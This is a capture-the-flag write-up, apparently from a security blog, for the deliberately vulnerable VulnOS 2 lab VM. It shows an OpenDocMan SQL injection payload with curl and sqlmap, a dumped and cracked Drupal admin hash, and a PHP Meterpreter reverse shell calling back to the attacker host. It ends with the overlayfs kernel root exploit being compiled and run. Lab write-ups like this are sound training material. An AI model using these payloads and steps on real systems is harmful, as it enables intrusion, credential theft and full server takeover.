published on in writeup
tags: vulnos

VulnOS: 2

Your assignment is to pentest a company website, get root of the system and read the final flag.

[email protected]:~# nmap -n -A -p- 192.168.56.104

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_  256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd

We’ll check out port 80 first.

Drupal

We follow the initial link to /jabc with a Drupal installation (given away by the favicon and bits of meta data such as <meta name="Generator" content="Drupal 7 (http://drupal.org)" />).

We can get to the login panel at /jabc/?q=user but I didn’t find any daft admin:admin type credentials that worked.

Initially, on the Documentation page, there doesn’t appear to be any content. But if you look at the source or so a Select-All to highlight the page, some black-on-black text becomes visible.

At /jabcd0cs is an installation of OpenDocMan. You can login with guest:guest and it sends you down a rabbit role, which ultimately I could not exploit. You can upload PHP files, but the mime-type appears disabled on the web server so it doesn’t grant you code execution.

SQLi

I looked up OpenDocMan 1.2.7 in exploitdb to see if there was anything I could take advantage of.

OpenDocMan 1.2.7 - Multiple Vulnerabilities			| ./php/webapps/32075.txt
[email protected]:~# less /usr/share/exploitdb/platforms/php/webapps/32075.txt 

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

If you try it quickly using cURL, you can see there’s a positive result in part of the HTML.

[email protected]:~# curl "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9"

5.5.47-0ubuntu0.14.04.1

So now we can throw it across to sqlmap to leverage this with more ease.

The injection is within the add_value parameter, but note that you require odm_user as part of it. The injection point is after this string (i.e. odm_user *). Since we know it’s UNION query-based, we can specify this on the command line, just to speed things up a bit. You don’t have to do this, sqlmap will find it regardless.

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --technique=U

---
Parameter: add_value (GET)
    Type: UNION query
    Title: MySQL UNION query (90) - 9 columns
    Payload: q=1&add_value=odm_user UNION ALL SELECT 90,CONCAT(0x7171707171,0x5a5a4549566c68564770435463486e4b506b464c746558705455556e73456a47584a6e4f55655542,0x7162717a71),90,90,90,90,90,90,90#
---
[20:33:39] [INFO] testing MySQL
[20:33:39] [INFO] confirming MySQL
[20:33:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0

My aim was to grab a username & password (or hash) from the Drupal DB. If I can gain some sort of admin access to the CMS, I may be able to upload a PHP backdoor to get a shell.

available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin


Database: drupal7
[140 tables]
+------------------------------------------+
| actions                                  |
| aggregator_category                      |
| aggregator_category_feed                 |
| aggregator_category_item                 |
| aggregator_feed                          |
| aggregator_item                          |
| authmap                                  |
| batch                                    |
| block                                    |
| block_custom                             |
| block_node_type                          |
| block_role                               |
| blocked_ips                              |
| book                                     |
| cache                                    |
| cache_block                              |
| cache_bootstrap                          |
| cache_field                              |
| cache_filter                             |
| cache_form                               |
| cache_image                              |
| cache_menu                               |
| cache_page                               |
| cache_path                               |
| cache_rules                              |
| cache_token                              |
| cache_update                             |
| cache_views                              |
| cache_views_data                         |
| ckeditor_input_format                    |
| ckeditor_settings                        |
| comment                                  |
| commerce_calculated_price                |
| commerce_checkout_pane                   |
| commerce_customer_profile                |
| commerce_customer_profile_revision       |
| commerce_line_item                       |
| commerce_order                           |
| commerce_order_revision                  |
| commerce_payment_transaction             |
| commerce_payment_transaction_revision    |
| commerce_product                         |
| commerce_product_revision                |
| commerce_product_type                    |
| contact                                  |
| ctools_access_ruleset                    |
| ctools_css_cache                         |
| ctools_custom_content                    |
| ctools_object_cache                      |
| date_format_locale                       |
| date_format_type                         |
| date_formats                             |
| field_config                             |
| field_config_instance                    |
| field_data_body                          |
| field_data_comment_body                  |
| field_data_commerce_customer_address     |
| field_data_commerce_customer_billing     |
| field_data_commerce_display_path         |
| field_data_commerce_line_items           |
| field_data_commerce_order_total          |
| field_data_commerce_price                |
| field_data_commerce_product              |
| field_data_commerce_total                |
| field_data_commerce_unit_price           |
| field_data_field_description             |
| field_data_field_image                   |
| field_data_field_product                 |
| field_data_field_tags                    |
| field_revision_body                      |
| field_revision_comment_body              |
| field_revision_commerce_customer_address |
| field_revision_commerce_customer_billing |
| field_revision_commerce_display_path     |
| field_revision_commerce_line_items       |
| field_revision_commerce_order_total      |
| field_revision_commerce_price            |
| field_revision_commerce_product          |
| field_revision_commerce_total            |
| field_revision_commerce_unit_price       |
| field_revision_field_description         |
| field_revision_field_image               |
| field_revision_field_product             |
| field_revision_field_tags                |
| file_managed                             |
| file_usage                               |
| filter                                   |
| filter_format                            |
| flood                                    |
| history                                  |
| image_effects                            |
| image_styles                             |
| menu_custom                              |
| menu_links                               |
| menu_router                              |
| node                                     |
| node_access                              |
| node_comment_statistics                  |
| node_revision                            |
| node_type                                |
| page_manager_handlers                    |
| page_manager_pages                       |
| page_manager_weights                     |
| queue                                    |
| rdf_mapping                              |
| registry                                 |
| registry_file                            |
| role                                     |
| role_permission                          |
| rules_config                             |
| rules_dependencies                       |
| rules_scheduler                          |
| rules_tags                               |
| rules_trigger                            |
| search_dataset                           |
| search_index                             |
| search_node_links                        |
| search_total                             |
| semaphore                                |
| sequences                                |
| sessions                                 |
| shortcut_set                             |
| shortcut_set_users                       |
| simpletest                               |
| simpletest_test_id                       |
| stylizer                                 |
| system                                   |
| taxonomy_index                           |
| taxonomy_term_data                       |
| taxonomy_term_hierarchy                  |
| taxonomy_vocabulary                      |
| tracker_node                             |
| tracker_user                             |
| url_alias                                |
| users                                    |
| users_roles                              |
| variable                                 |
| views_display                            |
| views_view                               |
| watchdog                                 |
+------------------------------------------+


Database: drupal7
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| language         | varchar(12)      |
| access           | int(11)          |
| created          | int(11)          |
| data             | longblob         |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| name             | varchar(60)      |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| status           | tinyint(4)       |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+


Database: drupal7
Table: users
[2 entries]
+---------+---------------------------------------------------------+
| name    | pass                                                    |
+---------+---------------------------------------------------------+
| <blank> | <blank>                                                 |
| webmin  | $S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug |
+---------+---------------------------------------------------------+

webmin1980

I tried running this hash through hashcat, with the brute force mode.

>hashcat64.exe -a 3 -m 7900 C:\Users\rasta\Desktop\drupal.txt

I went and walked the dogs at this point - when I got back it was just finishing the 9 character space. 10 would take another hour or so, which I wasn’t prepared to wait for. Before moving on to look at any of the other databases, I thought I’d try my luck basing the password off the username: webmin. This with some mangling rules got me the password pretty quickly. Though because the wordlist is so small, you’re better off switching to something that’s CPU based rather than GPU. So I used JTR.

[email protected]:~# john drupal --wordlist=word --rules=all

Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
webmin1980       (webmin)

PHP Shell

So now that I can log in as a Drupal admin, I can start poking around the backend (uh er). If you explore the Modules section, there’s one called PHP filter which is currently unchecked. It’s description is rather attractive: Allows embedded PHP code/snippets to be evaluated.

Enable the module and Save configuration.

Now go to Content > Add content. I think you can choose any type, I did Article. Give it a Title and add your PHP code into the Body section (I used some Meterpreter PHP Reverse shell goodness). Finally, select PHP code from the Text format drop down.

It should look something like this:

Set up your handler and you can simply click Preview.

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.104:41696) at 2016-09-09 22:03:29 +0100

meterpreter > sysinfo 
Computer    : VulnOSv2
OS          : Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686
Meterpreter : php/linux

Priv Esc

This turned out to be a rather simple task. We can already see the kernel version: 3.13.0, and we know it’s Ubuntu. We can quickly drop into a shell and find exactly which version:

Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.4 LTS
Release:	14.04
Codename:	trusty

Another quick search of exploitdb and we have a possible candidate.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell			| ./linux/local/37292.c

gcc is installed, so we can upload and compile on the target without any fuss.

meterpreter > pwd
/tmp

meterpreter > upload /usr/share/exploitdb/platforms/linux/local/37292.c x.c
[*] uploading  : /usr/share/exploitdb/platforms/linux/local/37292.c -> x.c
[*] uploaded   : /usr/share/exploitdb/platforms/linux/local/37292.c -> x.c

meterpreter > execute -f gcc -a x.c
Process 2651 created.

meterpreter > ls
Listing: /tmp
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100755/rwxr-xr-x  12189  fil   2016-09-08 20:27:48 +0100  a.out
100644/rw-r--r--  5123   fil   2016-09-08 20:26:32 +0100  x.c


meterpreter > shell

./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
root
# ls -l /root

-rw-r--r-- 1 root root 165 May  4 19:06 flag.txt
    
# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Thanks c4b3rw0lf for taking the time to make this VM :)